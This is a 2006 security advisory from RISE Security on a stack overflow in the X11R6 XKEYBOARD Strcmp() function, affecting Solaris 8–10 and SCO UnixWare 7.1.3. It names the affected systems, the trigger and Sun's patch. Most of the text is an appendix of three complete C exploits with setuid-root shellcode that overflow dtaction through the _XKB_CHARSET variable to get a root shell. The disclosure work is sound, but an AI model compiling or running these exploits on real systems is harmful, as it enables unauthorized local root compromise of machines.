RISE-2006001
X11R6 XKEYBOARD extension Strcmp() buffer overflow vulnerability
Released: September 07, 2006
Last updated: September 07, 2006
INTRODUCTION
There exists a vulnerability within a string manipulation function of the X11R6
(X11R6.4 and lower) X Window System library, which when properly exploited can
lead to local compromise of the vulnerable system.
This vulnerability was silently fixed in X11R6.5.1 release, but it is still
present in multiple vendors operating systems source tree.
This vulnerability was confirmed by us in the following versions and operating
systems, other versions and operating systems may be also affected.
Sun Solaris 10 SPARC/x86
Sun Solaris 9 SPARC/x86
Sun Solaris 8 SPARC/x86
SCO UnixWare 7.1.3
DETAILS
This vulnerability can be triggered by invoking a dynamicaly linked binary, with
_XKB_CHARSET environment variable set to a long string value, and DISPLAY
environment variable set to a X Window System server with the XKEYBOARD
extension enabled.
This is the vulnerable function (from X11R6.4).
static int
#if NeedFunctionPrototypes
Strcmp(char *str1, char *str2)
#else
Strcmp(str1, str2)
char *str1, *str2;
#endif
{
char str[256];
char c, *s;
for (s = str; c = *str1++; ) {
if (isupper(c))
c = tolower(c);
*s++ = c;
}
*s = '\0';
return (strcmp(str, str2));
}
The proof of concept codes we have written for this vulnerability can be found
in appendix section of this document.
All source codes from this document can be also downloaded from our website.
http://www.risesecurity.org/
VENDOR
Sun has released patches for this vulnerability, the Sun Alert ID is 102570
and it is available at the following URL:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102570-1
SCO did not answer to our email.
CREDITS
This vulnerability was discovered by Adriano Lima <adriano (at) risesecurity (dot) org [email concealed]> and
Filipe Balestra <filipe_balestra (at) hotmail (dot) com [email concealed]>.
DISCLAIMER
The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any information
provided, including any kind of information which is incomplete or incorrect,
will therefore be rejected.
APPENDIX
sol-sparc-xkb.c
/*
* X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC
* Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>,
* Ramon de Carvalho Valle <ramon (at) risesecurity (dot) org [email concealed]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Compile with the following command.
* $ (g)cc -Wall -ldl -o sol-sparc-xkb sol-sparc-xkb.c
*
* Set the DISPLAY environment variable to a X Window System server with
* XKEYBOARD extension enabled.
* $ ./sol-sparc-xkb sprintf|strcpy xserver:display
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dlfcn.h>
#include <link.h>
#include <sys/systeminfo.h>
#include <procfs.h>
#define BUFSIZE 13+256+64+2+1
#define FRMSIZE 64+3+1
#define ADRSIZE 2047+1
#define SHLSIZE strlen(shellcode)+1
#define DSPSIZE strlen(display)+1
#define ARGSIZE 7+1
#define ENVSIZE BUFSIZE+FRMSIZE+ADRSIZE+SHLSIZE+DSPSIZE
#define PFMSIZE strlen(platform)+1
#define PRGSIZE 20+1
#define PAD(a,b,c) a+=((b+c)%2)?(((a%8)>4)?(16-(a%8)):(8-(a%8))):((a%8)?(12-(a%8)):4);
char shellcode[]= /* 60 bytes */
"\x90\x1a\x40\x09" /* xor %o1,%o1,%o0 */
"\x82\x10\x20\x17" /* mov 0x17,%g1 */
"\x91\xd0\x20\x08" /* ta 0x08 */
"\x21\x0b\xd8\x9a" /* sethi %hi(0x2f62696e),%l0 */
"\xa0\x14\x29\x6e" /* or %l0,0x96e,%l0 */
"\x23\x0b\xdc\xda" /* sethi %hi(0x2f736800),%l1 */
"\x90\x23\xa0\x08" /* sub %sp,0x08,%o0 */
"\x92\x23\xa0\x10" /* sub %sp,0x10,%o1 */
"\x94\x1a\x80\x0a" /* xor %o2,%o2,%o2 */
"\xe0\x23\xbf\xf8" /* st %l0,[%sp-0x08] */
"\xe2\x23\xbf\xfc" /* st %l1,[%sp-0x04] */
"\xd0\x23\xbf\xf0" /* st %o0,[%sp-0x10] */
"\xc0\x23\xbf\xf4" /* st %g0,[%sp-0x0c] */
"\x82\x10\x20\x3b" /* mov 0x3b,%g1 */
"\x91\xd0\x20\x08" /* ta 0x08 */
;
void *find_symbol(const char *symbol){
void *handle,*addr;
char *err;
if((handle=dlmopen(LM_ID_LDSO,NULL,RTLD_LAZY))==NULL){
fprintf(stderr,"%s\n",dlerror());
exit(EXIT_FAILURE);
}
dlerror();
addr=dlsym(handle,symbol);
if((err=dlerror())!=NULL){
fprintf(stderr,"%s\n",err);
exit(EXIT_FAILURE);
}
dlclose(handle);
return addr;
}
void *find_rwxmem(void){
FILE *fp;
prmap_t map;
int flags;
void *addr;
if((fp=fopen("/proc/self/map","rb"))==NULL){
perror("fopen");
exit(EXIT_FAILURE);
}
while(fread(&map,sizeof(map),1,fp)){
flags=map.pr_mflags;
if((flags&(MA_READ|MA_WRITE|MA_EXEC))==(MA_READ|MA_WRITE|MA_EXEC)){
if(flags&MA_STACK) continue;
addr=(void *)map.pr_vaddr;
}
}
fclose(fp);
return addr;
}
int main(int argc,char **argv){
char buf[8192],display[256],platform[256],addr[8][4],*envp[6],*p;
int base,offset,i,flag=0;
printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC\n");
printf("Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>\n\n");
if(argc!=3){
fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}
if(!strcmp(argv[1],"sprintf")) flag=1;
if(!strcmp(argv[1],"strcpy")) flag=2;
if(!flag){
fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}
snprintf(display,sizeof(display),"DISPLAY=%s",argv[2]);
if(sysinfo(SI_PLATFORM,platform,sizeof(platform))==-1){
perror("sysinfo");
exit(EXIT_FAILURE);
}
base=((int)argv[0]|0xffff);
base++;
offset=ARGSIZE+ENVSIZE+PFMSIZE+PRGSIZE;
PAD(offset,1,sizeof(envp)-1);
*((int *)addr[0])=base-offset+ARGSIZE+BUFSIZE;
*((int *)addr[1])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE;
*((int *)addr[2])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE+ADRSIZE;
switch(flag){
case 1: *((int *)addr[3])=(int)find_symbol("sprintf")-4; break;
case 2: *((int *)addr[3])=(int)find_symbol("strcpy")-4;
}
*((int *)addr[4])=(int)find_rwxmem()+4;
*((int *)addr[5])=*((int *)addr[4])-8;
p=buf;
sprintf(p,"_XKB_CHARSET=");
p=buf+13;
for(i=0;i<256;i++) *p++='A';
for(i=0;i<66;i++) *p++=addr[1][i%4];
*p='\0';
memcpy(buf+13+256+56,addr[0],4);
memcpy(buf+13+256+60,addr[3],4);
p=buf+1024;;
for(i=0;i<(FRMSIZE-1);i++) *p++=addr[1][i%4];
*p='\0';
memcpy(buf+1024+32,addr[4],4);
memcpy(buf+1024+36,addr[2],4);
memcpy(buf+1024+60,addr[5],4);
p=buf+2048;
for(i=0;i<(ADRSIZE-1);i++) *p++=addr[1][i%4];
*p='\0';
envp[0]=&buf[0];
envp[1]=&buf[1024];
envp[2]=&buf[2048];
envp[3]=shellcode;
envp[4]=display;
envp[5]=NULL;
execle("/usr/dt/bin/dtaction","AAAAAAA",0,envp);
exit(EXIT_FAILURE);
}
sol-x86-xkb.c
/*
* X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86
* Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>,
* Ramon de Carvalho Valle <ramon (at) risesecurity (dot) org [email concealed]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define ADRSIZE 1024
#define NOPSIZE 4096
char shellcode[]= /* 47 bytes */
"\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */
"\x6a\x65" /* pushl $0x65 */
"\x89\xe6" /* movl %esp,%esi */
"\xf7\x56\x04" /* notl 0x04(%esi) */
"\xf6\x16" /* notb (%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17,%al */
"\xff\xd6" /* call *%esi */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68\x2f\x6b\x73\x68" /* pushl $0x68736b2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x50" /* pushl %eax */
"\x51" /* pushl %ecx */
"\x53" /* pushl %ebx */
"\xb0\x3b" /* movb $0x3b,%al */
"\xff\xd6" /* call *%esi */
;
int main(int argc,char **argv){
char buf[8192],display[256],addr[4],*envp[4],*p;
int i;
printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86\n");
printf("Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>\n\n");
if(argc!=2){
fprintf(stderr,"usage: %s xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}
snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);
*((unsigned int *)addr)=(unsigned int)buf+256+1024+2048+1;
p=buf;
sprintf(p,"_XKB_CHARSET=");
p=buf+13;
for(i=0;i<256;i++) *p++='A';
for(i=0;i<ADRSIZE;i++) *p++=addr[i%4];
for(i=0;i<NOPSIZE;i++) *p++='\x90';
for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
*p='\0';
envp[0]=buf;
envp[1]=display;
envp[2]=NULL;
execle("/usr/dt/bin/dtaction","dtaction",0,envp);
exit(EXIT_FAILURE);
}
sco-x86-xkb.c
/*
* X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86
* Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>,
* Ramon de Carvalho Valle <ramon (at) risesecurity (dot) org [email concealed]>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define ADRSIZE 1024
#define NOPSIZE 4096
char shellcode[]= /* 43 bytes */
"\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */
"\x6a\x65" /* pushl $0x65 */
"\x89\xe6" /* movl %esp,%esi */
"\xf7\x56\x04" /* notl 0x04(%esi) */
"\xf6\x16" /* notb (%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17,%al */
"\xff\xd6" /* call *%esi */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\xb0\x3b" /* movb $0x3b,%al */
"\xff\xd6" /* call *%esi */
;
int main(int argc,char **argv){
char buf[8192],display[256],addr[4],*envp[4],*p;
int i;
printf("X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86\n");
printf("Copyright 2006 RISE Security <contact (at) risesecurity (dot) org [email concealed]>\n\n");
if(argc!=2){
fprintf(stderr,"usage: %s xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}
snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);
*((unsigned int *)addr)=(unsigned int)buf+2048+256+1024+2048+1;
p=buf;
sprintf(p,"_XKB_CHARSET=");
p=buf+13;
for(i=0;i<256;i++) *p++='A';
for(i=0;i<ADRSIZE;i++) *p++=addr[i%4];
for(i=0;i<NOPSIZE;i++) *p++='\x90';
for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
*p='\0';
envp[0]=buf;
envp[1]=display;
envp[2]=NULL;
execle("/usr/dt/bin/dtaction","dtaction",0,envp);
exit(EXIT_FAILURE);
}
Best regards,
RISE Security
http://www.risesecurity.org/